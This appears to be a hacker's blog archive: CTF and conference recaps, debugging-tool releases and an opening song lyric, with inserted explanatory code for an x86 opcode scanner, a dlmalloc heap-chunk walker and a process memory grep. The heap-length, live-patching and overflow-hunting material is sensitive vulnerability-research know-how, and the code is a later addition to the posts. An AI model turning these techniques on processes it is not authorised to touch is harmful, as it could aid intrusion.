well i spend my life dreaming super dreams
but i hate to wake 'cuz then i see
that i'm nothing more than a dreamer
superstar in my dreams, i'm a dreamer
see the lights of stardom calling me
because only then someone i would be
see my goal in life was to get there
never satisfied
i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?
guess i'm scared to wake from these super dreams
scared to live the life that's been waiting for me
what would life be like with no bright lights?
tell me who i'd be with no spotlight?
i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?
God you'll have to say who i really am
'cuz i cannot live in this perfect dreamland
but i heard your dreams might be better
and i hope somehow...
a superstar i may never be
and that is just a reality
i wanna be a star but is that all i'm really here for?
and if i'm not a star will it be ok? could i still be someone?
-----
sitting in an airport, missing the ballgame, only really missing the commercials.
@
Dude, I'm out in DC on business and I get to hang with some of the kenshoto crew. *amazing* times... but scary as well... I get the distinct impression they may not be doing ctf next year!? wtfo?
Dude, lastplace got sk3wl3d this weekend at defcon. For those newcomers who are lost, I'm referring to the defcon capture the flag contest held each year in vegas. ctf has a history of drawing the best of the best from all corners of the world, and this year was even more so. wowhackers and taekwon-v from Korea came on strong, overcoming the language barrier and doing very well indeed. Up until the last five minutes of the game, taekwon-v had lastplace relegated to fourth place! Thankfully, the lastplace superpowers blasted one last break-through just in the nick of time to finish a solid third place (indeed, kenshoto even changed our name on the score-board to 3@stplace ;)
Sexy Pandas were sexier than ever this year, taking command of the game very early on. Unfortunately, as they did last year, the Pandas seemed to lose their Gambas around the middle of Saturday. I don't know what's up with them, but I'm guessing they need to learn to cope with more sleep-deprivation :) They were amazing while they lasted though (remember, they drew first-blood last year).
Shellphish was back again after "taking a year sabbatical", having not qualified last year. While it was good to see Giovanni Vigna and his team again, I was surprised that they didn't do as well as expected. As I can say the same about our team this year, I totally understand.
IGuardMiLan (sorry, I don't remember their real name), an Italian team from Milan, seemed to be doing very poorly (and unfortunately I didn't get a chance to get to know them much)... but on Saturday night kenshoto gave out a challenge and ominously indicated it was worth "a couple hundred points" and both Shellphish and these guys nailed it! I'm not sure what it is about these Italians ;) but the challenge turned out to be worth 300 points, which they both got! Rock on! Unfortunately for the Pandas, this placed both of these teams above them. The challenge was this: kenshoto provided a text file with all of Shakespeare's works. Our job was to find the longest run of bytes which convert to x86 opcodes which don't touch memory. Very cool challenge, I spent a little time on it, and actually found the answer with the tool I wrote. However, without my emulation code in place I also turned up many false answers, based on conditional jumps, so I dropped it. Bummer too. I wish I would have submitted it.
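The scan described above, as an added example that is not the tool atlas wrote for the challenge: it decodes a deliberately small subset of 32-bit x86 (one-byte register/flag instructions, the ALU and mov forms whose ModRM byte selects a register, and immediates) and finds the longest run of consecutive instructions with no explicit memory operand. Two assumptions are baked in and labelled in the code: push/pop count as register-only even though they touch the stack implicitly (the post does not say how the challenge treated them), and conditional jumps are excluded unless allow_jcc=True, which reproduces the kind of false positive the post attributes to conditional jumps.

```python
"""Added example, not atlas's challenge tool: longest run of bytes that decode
as 32-bit x86 instructions with no explicit memory operand.  Only a small
subset of the opcode map is decoded; any other byte ends a run.
Assumptions: push/pop/inc/dec r32 count as register-only (implicit stack
access ignored); jcc rel8 is excluded unless allow_jcc=True."""

# One-byte instructions whose operands are all implicit registers/flags.
ONE_BYTE = set(range(0x40, 0x60))            # inc/dec/push/pop r32 ('@', 'A'-'Z', '[', '\\', ']', '^', '_')
ONE_BYTE |= set(range(0x90, 0x98))           # nop, xchg eax, r32
ONE_BYTE |= {0x98, 0x99, 0x9E, 0x9F, 0xF5}   # cwde, cdq, sahf, lahf, cmc
ONE_BYTE |= set(range(0xF8, 0xFE))           # clc, stc, cli, sti, cld, std
JCC = set(range(0x70, 0x80))                 # jcc rel8: 'p'..DEL followed by any byte


def _reg_modrm(buf, i):
    """True if buf[i] exists and is a ModRM byte with mod=11 (register, not memory)."""
    return i < len(buf) and buf[i] >= 0xC0


def decode_len(buf, i, allow_jcc=False):
    """Length of the memory-free instruction at buf[i], or 0 if the byte is not
    in the decoded subset, selects a memory operand, or runs off the buffer."""
    n, op = len(buf), buf[i]
    if op in ONE_BYTE:
        return 1
    if op in JCC:
        return 2 if allow_jcc and i + 1 < n else 0
    if op < 0x40:                            # add/or/adc/sbb/and/sub/xor/cmp
        form = op & 7
        if form < 4:                         # r/m,reg or reg,r/m with ModRM
            return 2 if _reg_modrm(buf, i + 1) else 0
        if form == 4:                        # al, imm8
            return 2 if i + 1 < n else 0
        if form == 5:                        # eax, imm32
            return 5 if i + 4 < n else 0
        return 0                             # push/pop seg, prefixes, daa/das/aaa/aas, 0x0F escape
    if op in (0x80, 0x83):                   # group-1 ALU r/m8,imm8 and r/m32,imm8
        return 3 if _reg_modrm(buf, i + 1) and i + 2 < n else 0
    if op == 0x81:                           # group-1 ALU r/m32,imm32
        return 6 if _reg_modrm(buf, i + 1) and i + 5 < n else 0
    if 0x84 <= op <= 0x8B:                   # test/xchg/mov with ModRM
        return 2 if _reg_modrm(buf, i + 1) else 0
    if 0xB0 <= op <= 0xB7:                   # mov r8, imm8
        return 2 if i + 1 < n else 0
    if 0xB8 <= op <= 0xBF:                   # mov r32, imm32
        return 5 if i + 4 < n else 0
    return 0


def longest_run(buf, allow_jcc=False):
    """Return (offset, byte_length, instruction_count) of the longest run.
    Walks right-to-left so each offset is decoded once: the run starting at i
    ends wherever the run starting at i + len(insn) ends."""
    n = len(buf)
    end = [n] * (n + 1)
    count = [0] * (n + 1)
    for i in range(n - 1, -1, -1):
        l = decode_len(buf, i, allow_jcc)
        if l == 0:
            end[i] = i
        else:
            end[i], count[i] = end[i + l], count[i + l] + 1
    best = max(range(n), key=lambda i: end[i] - i, default=0)
    return best, end[best] - best, count[best]


if __name__ == "__main__":
    import sys
    # Constructed fallback input; pass a file path (e.g. a text dump) to scan it instead.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else b"Shall I compare thee to a summer's day?"
    for jcc in (False, True):
        off, length, n_insn = longest_run(data, allow_jcc=jcc)
        print(f"allow_jcc={jcc}: offset {off:#x}, {length} bytes, {n_insn} instructions")
```

Running it with allow_jcc=True typically reports longer runs than with the default, because a jcc rel8 is memory-free but its target may land outside the run; deciding whether the run is actually executable straight through needs emulation, which is the gap the post describes.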
The Routards were back from last year, and came out of nowhere on Saturday to overtake us as second place, where they remained for the rest of the game. A French/Suisse team, they were really smokin!
And then (sound the Imperial March) came the Sk3wl 0f r00t. Led by Jon Boss ("BossMan") and driven by Chris Eagle ("sk3wlmast3r"), these guys *completely* rocked our world. For the last two years lastplace has been stealing victory right out of this team's clutches using creativity, game-play, and a slight touch of evi1. This year, Sk3wl returned all we had given them and more. Probably most evi1 was when we used some technical prowess to keep Sk3wl from getting credit for many points last year, for several periods of several hours. This year, Sk3wl multiplied both the evi1 as well as the technical awe of our attack from last year, instead, denying any of our teams the ability to score. How they did this, I can't say specifically, but let's just say they pwned the services themselves and made their own version of a "service-r00tkit", modifying information to either prevent us from gaining shell on the box or changing the contents of keys so we received bogus keys and our overwrites were dorked as well.
I gotta admit, if we couldn't win, I'm ok with Sk3wl winning. Not only did they *totally* deserve it this year, but they're a great bunch of guys. I have a lot of respect for sk3wlmast3r and Bossman and the team they fielded this year was truly outstanding. Their game-play was flawless, their technical leetness was untouched, and they have real character. At the end of the game, they set up their own projector on the wall over their team and played Guitar Hero... lol... but before they did, Bossman came over and said to me "I know this is going to seem arrogant, but this was not our idea... and I just wanted to let you know." That was pretty cool of them. They had every right to rub it in, but chose not to. rock on guys.
Ah, my dear lastplace.... On a personal note, I think it was really good for us to lose this year (sorry team, it's what I think). We came in as two-time, back-to-back winners, and a third time would have already been difficult to remain humble about. We also had let ourselves get complacent. I'm sorry guys, this one falls completely on me. As the buck-stopper, and as your captain, I failed in many ways, the chunks of which I will not spew here. Having succeeded from the very beginning, I knew I/we were doing the right things for success... but I didn't really remember what the right things were this year... so it was a growing experience. Having not been defeated, I personally felt the stress of continuing the winning streak, even as much as I struggled against it. And after three consecutive wins, I was heavily considering "retiring" at least for a year or two. Now? I'm not quite sure what's going to happen. I know some of the guys are happy to field a team again next year. I'm going to hit 'em up in a few months. ctf bears some strong similarities to childbirth. Gradually one forgets how much pain and agony and misery goes into ctf, and for some crazy reason the desire to play again returns :) On the positive side, we played a very good game, aside from a few failings of mine. Most impressive to me is how much our attack-team has improved as a whole. We still have a couple rock-stars, but each of our attack team were "in the game". psifertex, jrod, jesse, drb, and myself, we were all in the same playing-field. That doesn't mean I think we don't need to do some training soon. I've got some very specific things in mind and there are many others I'm sure. But I got to see some of the other, lesser-contributors last year really stepping up, and that encourages me that the team is doing what it's meant to do. I'm also looking forward to our feeling challenged to excel... instead of just being "good enough".
To show up to the game is to be a winner. Each of the eight teams has to qualify in order to play the game (the returning champions don't actually have to play the quals round, but by being champions they already "qualify"). This year, well over 400 teams showed up for quals, and actually answered at least one question. I think at least 150 teams answered two or three. This is pretty significant, considering. Each of the teams I got to chill with this weekend had significant skillz, and it was an honor to be among them.
Ok, here's the (teasing) rant part of this blog post. Each of the teams playing in ctf qualified for the game... except one. One additional Korean team qualified this year, but they dropped out and we ended up with the first runner-up... That wasn't so bad (in fact, I was happy at the time because I have friends on the team which got to come). However, little did I know that this "first-runner-up" team would go on to completely dominate the game, shutting down our ability to score, and run away with the competition. That's right, folks. Sk3wl 0f r00t *failed to qualify*! lol. Oh well. </rant> I'm still glad they came. However, this highlights the reason lastplace has taken part in quals each year even though we didn't have to: ctf and quals are two very significantly different games, each one being amazingly awesome and worth the time and effort. kenshoto continues to deliver top-notch entertainment for the subversively-minded binary-hacker.
Many thanks to kenshoto, and especially to my good friends visi and squires... who did bring a fully-automated nerf-gun into my talk at defcon and launched a massive assault on the stage... that was awesome. In an otherwise draining and sad day, that gave me a great boost. I warned the crowd they might have to wake me up in the middle of the talk. I had bounced all over throughout the country, flying, driving, not sleeping, etc... and was already exhausted when I showed up for the sleep-depriving all-weekend siege of ctf.
BTW - If visi doesn't see fit to keep vtrace/vdb available from http://www.kenshoto.com/vtrace I may be led to post them here.
sk3wlmast3r rocks. Let me just say that. He's an awesome guy, and one of the most brilliant reversers I've ever met. The last two years when lastplace beat his team, he was exceedingly gracious, meeting me with a (albeit disciplined) smile and congratulations. There's no doubt about the fact that he currently dwarfs me in skillz... but I've always been impressed with the man behind the evi1 :) I got to go see his talk at defcon (after ctf) and it was pretty slick. Keep on, man.
disass-v4.0 didn't make it for ctf. Sadly I had to use a mixture of disass-v3.0 and IDA to work on the vulns. This will continue to consume me for some time, until I have a workable GUI or I give up the whole mess (and mebbe write a CLI). I'm currently considering opening up development to interested outsiders, as it's quickly growing beyond something I can/want-to maintain alone. I'm not a GUI programmer, and would prefer telling someone how I want the GUI to behave and then go write the cool methods the GUI calls to actually do the work. Just a heads-up.
I got to spend time with a smattering of great friends this weekend, too many to list, and way too short a time to spend with each. But I wanted to send a shout-out to my awesome team, drb, wrffr, psifertex, mezzy, plato, shiruken, jrod, apu, and a couple guys who hung with us a bit and helped out some with a couple bins, and all the ctf teams (you all rock). Greetz to sk0d0 and jmfb, Figueroas, Subverted Dave, j0hnny, Thor (even though you skipped out on me :) Travis Goodspeed, GMark, vangelis, kenshoto (inc goons and pj, nice dice), Moose and VirusX (now *with* the Moose! thx for the Braundo dude, it kept me up on Saturday!), and the dudes who came to my Q&A session,
R.I.P. E P I C. I missed you. If we'd won ctf I was going to say it from stage.
Well my friends, CTF Quals 2008 has officially passed, and what a wild ride it was. I'm barely awake this morning, not fully recovered from the weekend... but I'm sure some of that has to do with the incredible Paintball-Bachelor party I was called upon to make happen on Saturday. Yes, my team had to do without me for about 12 hours of the competition. I'm the best man, what could I do? Thankfully I have a brilliant team and a very strong co-captain. Even without me, they had to pull back a bit to avoid directing the game. You see, as last-year's CTF winners, we don't have to qualify (place in the top 7 teams), and feel a little awkward about choosing categories which could make or break other teams.
Intro to Quals
For those of you who are unfamiliar with the phenomenon that is Quals, each year Kenshoto, a terribly cool bunch o' hackers, puts on the Defcon Capture-the-Flag hacking contest, but to get into the contest your team has to qualify. Quals (ctf Qualifier round) typically takes place a week or two after Memorial Day, and is a Jeopardy-like game with five categories with five challenges each providing from 100-500 points (no, there's no Double-Quals entry where you get to choose how many points to gain/lose). Unlike Jeopardy, in recent years Quals doesn't reduce points for wrong answers, and while each team somewhat chooses their own pace, you can only select challenges that are "available". The team who answers the newest challenge first gets to choose the next challenge, making it available to the rest of the teams. Quals has always been an excellent training-ground, and a worthy game in and of itself. In fact, Quals in 2005 was my entry and training-grounds for hard-core binary hacking.
If you remember last year, all the leading teams made it through all but one of the challenges, and it was the Binary Leetness 500 point challenge. It was insane and incredible, and worthy of spending our time. This year was a bit more of everything (except web-hacking, but more on that in a minute). The only down-side I ran into this year was BinLeet300, a challenge which I feel could have been better scoped or something. The question was "What libc function is this?" and we were given 57 bytes of binary which converted into basically a spinlock and a strlen. The question led me to believe that I got to see the whole function, although I have heard the answer was inet_aton. what?
However, that's a minor complaint, whereas the whole rest of the game was amazing. First off, let me just pay homage to kenshoto's ability to keep the game stable!
Forensics 500 was quite the challenge, being an image of Kenshoto's logo, requiring conversion to another format and then analysis of the colors to identify an undisclosed form of stego.
BinLeet400 was a BSD kernel module which replaced much of the kernel call-table (yes, rootkit-style) with pass-through wrapper versions.
My favorite of the whole game was RealWorld300, a telnet-based D&D style game. Enter your name, hack your way through (literally, but the game was an RPG about hacking), and if you win, you find yourself the proud recipient of a format string exception. Through that FSE, you have to figure out what address to overwrite and what to overwrite it with. Thankfully, the FSE is great for stack-based recon. Read the write-up on http://nopsr.us to find our nifty stack-address-math-magic. Very fun, and I think the best part was getting to hack alongside drb most of the time. He's a brilliant friend, but we always seem to be working on separate tasks.
One interesting thing was the loss of the WebHacking category. I feel it is a loss indeed, as this is where most vulns are found these days... however, with the inclusion of RealWorld, I think the game was better this way.
Sk3wl0fr00t did not qual this year... perhaps sk3wlmast3r had a Bachelor party to attend as I did. I don't know what happened for them this year, however this is a great example of how different quals are from ctf (not that I'm complaining, they're both amazing). I'm sure that someone will drop out and that this ctf-titan will once again be making the competition difficult for all of us.
Shellphish was among the teams to qualify for ctf. Proven to be powerful in the past, this former-ctf-champion failed to qualify last year for whatever reason. Led by Giovanni Vigna, Shellphish will make the competition interesting to say the least.
For those with a pair, check out the Quals write-ups over at http://nopsr.us
Sorry, but no GUI yet. Still working on a great deal of changes for disass, including disass-emu, an emulation framework for x86. As you can imagine, these take an immense amount of work. Kenshoto has asked 1@stplace to create a challenge for the impending CTF Qualifiers, and it's been eating up a great deal of my time lately.
Well the great and mighty shmoo has left the building. What a weekend. I'm beat.
I couldn't get in until Saturday night, but I hear Friday and Saturday were amazing. Everything from H1kari's FPGAs attacking cellular to hacking Second Life's helper apps (dude, they really hacked quicktime through the game!? sweet!). Jay Freakin Beale had an a cappella rap-cameo by his fellow Intelguardian JimmyD! G Mark is always interesting to hear and cool to chat with. Simple Nomad apparently had a picture of him on CNN (Crappy Network News) where they named him Mike and made him look like Winn Schwartau! Unbelievable. All I have to say is WWDKD? ok, just listing Dan Kaminsky in a place where Jesus has been is making me step away from the keyboard....
<long pause>
ok. I'm back. No lightning yet... although I've checked my life insurance.
I had a beer scheduled with Moose, but nothing ever came of it (sadly). Hopefully we'll be able to sit down and chat some other time. Same deal with Joe from learnsecurityonline, but at least we hooked up by phone. He's putting together a cool set of binary reversing challenges for his readers and has graciously asked for my input and possibly help. We'll see what comes of it.
And Darren from hak5 was also supposed to catch up with me after my talk (9am was too early for them :) but he got held up as well. I'm thinking the parties were just too good, because by Sunday everybody was asleep. I actually drank red bull just before my presentation to try to regain some kick I had lost. Yes, I went to the shmoo party and got to see Pablos and his gang break it down. What was amazing was the number of folks in blue lock-shirts that cut a rug. Even Ed Skoudis was doin a dance! Jay MFBeale, well, you see there are dancers and there is Jay.... the difference? Dancers get tired and take a break. Jay is a freakin animal! Lara, dude, Lara. But the man with presence, Mike Poor, was dancing the whole freakin night! Whatever they're drinkin at Intelguardians has got to be better than redbull! gimme some-o-dat! I spent most of the night over in the corner writing code. No, I'm not completely inept on the dance-floor, but I wanted to get a few things tweaked and tuned before my talk. Just because I gave a talk on the same topic at POC doesn't mean I don't work a lot on it in between. Programmatic Debugging for Vulnerabilities is a relatively new topic (at least for public consumption). Expect the topic to hit BH and defcon this year as well (if they'll have me), and full of untapped potential.
To be specific, and not just another "blogger positing his empty opinion", I was truing up the code which determines heap chunk length. Finding buffer overflows is not a simple task, and at the very core of that search (at least in this approach) is being able to consistently determine interesting values for buffer length. Stack buffers and heap buffers both present their own challenges. At POC I had the concept of measuring stack buffer length by finding a valid return pointer higher on the stack and measuring the difference. For that I developed findRET(), which, once I worked out a few bugs, is quite accurate. For HEAP chunk length, however, I was focused on DL Malloc and relying on HEAP chunks keeping their buffer length at ptr-4 (the 32-bit number immediately preceding the memory pointer location). Unfortunately, many of the calls to memcpy() are copying portions of a HEAP chunk (since HEAP chunks are often cut to the size of a structure), so the values immediately preceding many destination HEAP buffers are anything but the length of the buffer. That length may have been implied by the struct used to access the HEAP chunk, but that information is long gone, and must be reversed (another great topic).
So this time around I improved the HEAP length issue by running the allocated HEAP structures (again, DL Malloc, but RTL won't be hard to add). Once I find the HEAP chunk past the HEAP address we're measuring, we take the difference as the length. The odd thing I found was that the HEAP in some binaries (e.g. top on linux) doesn't start at the beginning of the HEAP memory map. So, tracing the HEAP means finding it first. So you'll find code in getConnectedChain() that first searches for a connected chain of HEAP chunks before traversing it and returning the start of each HEAP chunk.
I need to mention that these methods are still somewhat arcane and unrefined. They will indicate the most fruitful overflows, such as overwriting RET or the HEAP control structures.... They will not indicate overwrites which occur within the same HEAP chunk or between stack buffers.
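The heap-length approach described in the three paragraphs above, as an added example that is not atlasutils' getConnectedChain() code: it models the 32-bit DL Malloc layout the post assumes (each chunk is a prev_size word, a size word with flag bits in the low three bits, then user data at chunk+8), searches a constructed heap image for the first offset from which a chain of plausible chunks reaches the end of the region, and then measures a destination pointer's length as the distance to the end of the chunk that contains it. The naive_len() function shows the ptr-4 shortcut giving a wrong answer for a pointer into the middle of a chunk. The heap base address, chunk sizes and junk prefix are all constructed values.

```python
"""Added example, not atlasutils' own code: measure the usable length of a heap
buffer from a destination pointer by walking DL Malloc chunk headers instead
of trusting the size word at ptr-4.  Assumed layout (32-bit dlmalloc, as in
the post): [prev_size][size|flags] then user data, so user ptr == chunk + 8
and the size field includes the 8-byte header."""
import struct

HDR = 8          # prev_size + size
FLAGS = 0x7      # PREV_INUSE / IS_MMAPPED / NON_MAIN_ARENA live in the low bits
MIN_CHUNK = 16   # smallest chunk dlmalloc hands out on 32-bit


def walk_chunks(region, base, off):
    """Follow size fields from off. Returns ([(chunk_addr, size)], offset where the
    chain ended or broke on an implausible size)."""
    chunks = []
    while off + HDR <= len(region):
        size = struct.unpack_from("<I", region, off + 4)[0] & ~FLAGS
        if size < MIN_CHUNK or size % 8 or off + size > len(region):
            break
        chunks.append((base + off, size))
        off += size
    return chunks, off


def find_connected_chain(region, base, min_chunks=3):
    """Locate the heap inside a region that does not start with a chunk: the first
    offset whose chain of plausible chunks runs to the end of the region wins."""
    for off in range(0, len(region) - HDR, 4):
        chunks, end = walk_chunks(region, base, off)
        if len(chunks) >= min_chunks and end == len(region):
            return off, chunks
    return None


def chunk_len_from_addr(chunks, addr):
    """Bytes from addr to the end of the chunk whose user data contains it (None if
    addr is in a header or outside the chain)."""
    for chunk_addr, size in chunks:
        if chunk_addr + HDR <= addr < chunk_addr + size:
            return chunk_addr + size - addr
    return None


def naive_len(region, base, addr):
    """The ptr-4 shortcut: read the word before the pointer as if it were a size field."""
    return struct.unpack_from("<I", region, addr - 4 - base)[0] & ~FLAGS


def build_sample_region():
    """Constructed heap image: 12 junk bytes, then chunks of 0x20, 0x30 and 0x18
    bytes, each flagged PREV_INUSE, with zeroed user data."""
    blob = bytearray(b"\xAA" * 12)
    for size in (0x20, 0x30, 0x18):
        blob += struct.pack("<II", 0, size | 1) + b"\x00" * (size - HDR)
    return bytes(blob)


if __name__ == "__main__":
    base = 0x0804A000                      # constructed heap base address
    region = build_sample_region()
    off, chunks = find_connected_chain(region, base)
    dest = base + 68                       # 16 bytes into the second chunk's data, like a struct field
    print(f"chain starts at +{off}: {[(hex(a), s) for a, s in chunks]}")
    print(f"walked length from {dest:#x}: {chunk_len_from_addr(chunks, dest)} bytes; ptr-4 says {naive_len(region, base, dest)}")
```

The region here is a byte string; in a live tracer it would be the bytes read from the writable mapping that holds the heap, with base set to that mapping's start. The min_chunks threshold guards against junk that happens to look like one or two valid headers.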
Slides are here: odp pdf. New releases of atlasutils (formerly the @ Utility Belt) are coming shortly.
Greetz to visi and squires, alien and hackerprincess, sk0d0 (nice pic!), sk3wlmast3r & son, Toby and joshwright, G. Mark, chris paget, vangelis, beetle, hollywood and jsyn, keith myers!, Intelguardians (choops for supporting the con!) and ASI guys. It was excellent to see you all again!
And thanks to those who came to my talk (for not stepping in front of the whizzing redbull and causing legal headaches!) Dude, Chuck, smile! Seriously, I hope you all enjoyed the talk and got something out of it.
I originally was going to publish a video of me performing the demonstration I included at the end of my POC presentation.
Obviously, that hasn't happened. It took about all the time and energy I had to complete the atlas utility belt when I did, and I'm just starting to recover from the past three months (or rather, my wife is).
I much prefer encouraging others to have their fingers typing anyway, so I'd like to post instructions for doing the demonstrations yourselves.
First download and install vtrace and atlasutils...
This consists of:
$ tar zxf vtrace*gz
$ cd vtrace
$ sudo python setup.py install
(atlasutils is the same process)
Once you have installed vtrace and atlasutils, here are the demos, step-by-step. If you don't get similar results, please email me at here and should be in the local directory)
1. Start up kcalc (only have one instance running)
2. From a shell prompt find out the ProcessID of kcalc by typing "ps ax |grep kcalc"
3. "./memgrep.py 'kcalc'"
4. Many instances of 'kcalc' should show up, along with a virtual memory address in hex for each
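What the memgrep step is doing under the hood, as an added example that is not atlasutils' memgrep.py: on Linux a process's readable mappings are listed in /proc/<pid>/maps and their contents can be read through /proc/<pid>/mem (given ptrace permission over that process, i.e. your own processes under the usual settings), and each hit is reported at its virtual address. The maps parser and the search are pure functions exercised on constructed data; the maps lines and addresses below are made up, and memgrep() is the live wrapper around them.

```python
"""Added example, not atlasutils' memgrep.py: find a byte pattern in a process's
memory via /proc/<pid>/maps and /proc/<pid>/mem, reporting virtual addresses."""
import re

# Constructed /proc/<pid>/maps lines (addresses and inode numbers are made up).
SAMPLE_MAPS = """\
08048000-0807b000 r-xp 00000000 08:01 131 /usr/bin/kcalc
0807b000-0807d000 rw-p 00033000 08:01 131 /usr/bin/kcalc
0807d000-08090000 rw-p 00000000 00:00 0   [heap]
ffffe000-fffff000 r-xp 00000000 00:00 0   [vdso]
"""

# start-end perms offset dev inode [pathname]
MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) \S+ \S+ \S+\s*(.*)$")


def parse_maps(text):
    """Return [(start, end, perms, name)] for every readable mapping in maps text."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line)
        if not m:
            continue
        start, end = int(m.group(1), 16), int(m.group(2), 16)
        perms, name = m.group(3), m.group(4)
        if "r" in perms:
            regions.append((start, end, perms, name))
    return regions


def grep_region(data, base, pattern):
    """Virtual addresses of every occurrence of pattern in data, which was read
    from base; overlapping occurrences are all reported."""
    hits, i = [], data.find(pattern)
    while i != -1:
        hits.append(base + i)
        i = data.find(pattern, i + 1)
    return hits


def memgrep(pid, pattern):
    """Live search: walk the readable mappings of pid and grep each one.
    Regions that cannot be read (guard pages, vsyscall) are skipped."""
    with open(f"/proc/{pid}/maps") as f:
        regions = parse_maps(f.read())
    hits = []
    with open(f"/proc/{pid}/mem", "rb", 0) as mem:
        for start, end, perms, name in regions:
            try:
                mem.seek(start)
                data = mem.read(end - start)
            except (OSError, OverflowError, ValueError):
                continue
            hits.extend(grep_region(data, start, pattern))
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                       # memgrep.py <pid> <pattern>
        for addr in memgrep(int(sys.argv[1]), sys.argv[2].encode()):
            print(f"{addr:#010x}")
    else:                                        # offline demo on the constructed maps
        for start, end, perms, name in parse_maps(SAMPLE_MAPS):
            print(f"{start:#010x}-{end:#010x} {perms} {name}")
```

Each hit printed by the live mode is the virtual address of one copy of the pattern, which is the value the LivePatch and LiveOrganTransplant steps take as their argument.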
LivePatch demo
(LivePatch is a part of the atlas utility belt)
1. With kcalc still running, pick one of the instances from memgrep.py demo.
2. Type "echo 'atlas' | LivePatch 0x0807ca20"
LiveOrganTransplant demo
(LiveOrganTransplant is a part of the atlas utility belt)
1. With kcalc still running...
2. Type "LiveOrganTransplant 0x0807ca20 1"
1. With kcalc still running...
2. From a shell prompt, type "python" and hit enter
3. From the ">>>" prompt, type "from atlasutils.vtraceutils import *"
4. Type "me=atch('kcalc')"
5. Type "print printStuff(me)" to display some of the most common details about a thread
6. Type "ni(me)" to execute the next instruction (stepping over calls) and printing summary info
7. Type "si(me)" to execute the next instruction (stepping into calls) and printing summary info
8. Type "stepi(me)" to execute the next instruction for each thread
9. Type "traceme(me)" to step through the process printing the output from "printStuff()" after each step
* note: traceme has many options, allowing you to control when it stops processing, like untileip, untilop, and untilreg
* note: you will want to interact with kcalc (which will appear dead) in order to free up the thread from blocking for input
* from the >>> prompt, type "help(traceme)"
10. Type "CTRL-C" to stop the traceme object
atlasutils 2.2.5 release
Happy Thanksgiving to all those who celebrate it. I have much to be thankful for, and I am.
At long last, here is a new release of atlasutils, formerly known as the @ Utility Belt.
This release includes an increased wealth of command-line utilities (including VulnCatcher.py), poorly documented as always, and several new python libraries, most notably disassutils.py and vtraceutils.py. These libraries require libdisassemble and vtrace, respectively.
What will most likely interest my Korean friends is found in vtraceutils.py and the VulnCatcher.py script. VulnCatcher lays out an infrastructure for leveraging programmatic debugging to identify vulnerabilities, not only providing locations in code, but also key information required to exploit it. For more information, see my presentation slides and whitepaper (in my previous blog entry). There are still some rough spots to iron out, and many more breakpoints to be created.
Vtrace on Ubuntu has been giving me some fits handling some Breakpoints correctly. Invisigoth should have a new release for us soon.
Note findRET() in the vtraceutils library, my first release of a stack-backtracing tool. It seems to be quite accurate, but complaints and bug-reports (and fixes) are always welcome.
Thanks for your support. I hope you enjoy the toyz.
@
Just flying back from Seoul, Korea, where vangelis and some pretty awesome Korean hackers put on the POC 2007 con (Power Of Community). Very cool conference. A large amount of brain-power in that building. Got to hang with friends vangelis, Dave Aitel, and The Grugq, and many other great hackers. Great talks there including hacking Web 2.0, hacking from a Nintendo DS, some debugging talks (including Dave's and mine), hacking COM (very cool!), and my personal favorite: hacking BIOS and VMware (gee, now that sounds familiar...).
I gave a talk on programmatic debugging using one of several powerful and new debugging APIs for your favorite interactive scripting language. It covered several ways that these tools can help in hacking and in particular an approach to make vulnerabilities suddenly appear. The presentation slides can be found HERE and the whitepaper HERE.
My many thanks to vangelis for inviting me to speak at POC2007 and to the many great hackers I got to meet at the conference. Seoul was beautiful and the people very friendly. I was honored by the reception that J and I received by people and hackers alike.
Special choops go out to the following hackers and friends:
Sun Bing - whoa dude, nice work... and in your spare time no less.
AmesianX - you are simply brilliant, nice work
Boem - thanks, friend. I appreciated the chill-time with you
GilGil - Nice work. Keep coding and fighting the good fight. Freedom.
vangelis, Dave, Grugq, Heinrich... it was great. Thanks for making the trip great for both me and J. You all rock.
@
ps. watch for new releases of the @ Utility Belt as well as some demo instructions for vtrace fun hopefully this week...
Hey all,
Sorry it took me so long after defcon to release these. It's been crazy (thus the 2am posting time)
Disass v3.0 has been rewritten from the ground up, utilizing the 100% Python libdisassemble instead of relying on objdump like previous versions. This has been a bumpy road, but I think it is a positive step. I didn't get nearly as much accomplished as I would have liked, but the core disass is there. The idea was to include interactive python scripts which interact with the disass objects to find vulnerabilities. Alas, that will have to wait, for the moment. Too many other things pressing. If you are eager to see this progress, download the tool, play with it, and then email me feedback (heck, bug reports are good too). I now maintain libdisassemble, along with Matthew Carpenter from Intelguardians, so anything that looks strange or disassembles differently with IDA or some other tool, please let me know. YOU MUST HAVE INSTALLED THE @ Utility Belt IN ORDER FOR DISASS TO WORK!
@ Utility Belt v2.2 - This is not really a rewrite, but new tools have been added, older tools have been cleaned up, and a python installer has been included, to install the scripts into the command path and the libraries into the appropriate locations. This is also the first release to split disass away from the belt.
To install either of these tools, untar them, chdir into the appropriate directory, and execute the following:
"sudo python setup.py install"
It's been a week and I'm finally getting a chance to write about it. defcon 15 was another amazing ride. My talk went well, I got to hang out with friends, and oh don't forget another round of black badges and leather jackets.
Once again, I can brag on my ability to surround myself with amazing folk. drb, fury, jrod, mezzendo, plato, psifertex, shiruken, wrffr, each talented, each proven capable of finding and exploiting binary vulns like buffer overflows, and each a key part of our team. I'm honored to have them on my team, and have been rewarded with two years of victory at the con.
We were impressed with a great showing by the Sexy Pandas from Spain, who were the only other team to take the lead throughout the game. But once again, the most amazing team we competed against was the Sk3wl of r00t, largely from the Naval Postgraduate School. The most potent, once again, was Sk3wlmast3r.
Also featured this year were teams from Korea, France, and I believe, Sweden. This year, kenshoto put on yet another amazing game, but with fewer glitches. Only a couple network glitches which caused interesting submission issues.
I'd like to take the chance to reiterate my respect for everyone who made it to that game. To qualify for CTF is to win.
Not a lot more to say than that. Thank you gentlemen.
I just got to hang out at the Idylwood Grill, a very classy restaurant in DC, where it brings value to an otherwise uninteresting strip-mall. I was hanging out with my good friend invisigoth, and some other *very cool* kenshoto folken (greetz Troy, Jim and Jarod, it was awesome).
The Idylwood has been world-famous at least since this year's CTF quals used a picture of the Idylwood in one of the Forensics challenges, and the name *was* the key for the challenge.
I got to also hang out with the owners, Heady and Marco, their lovely waitress whose name escapes me, and PJ, an all-around good guy.
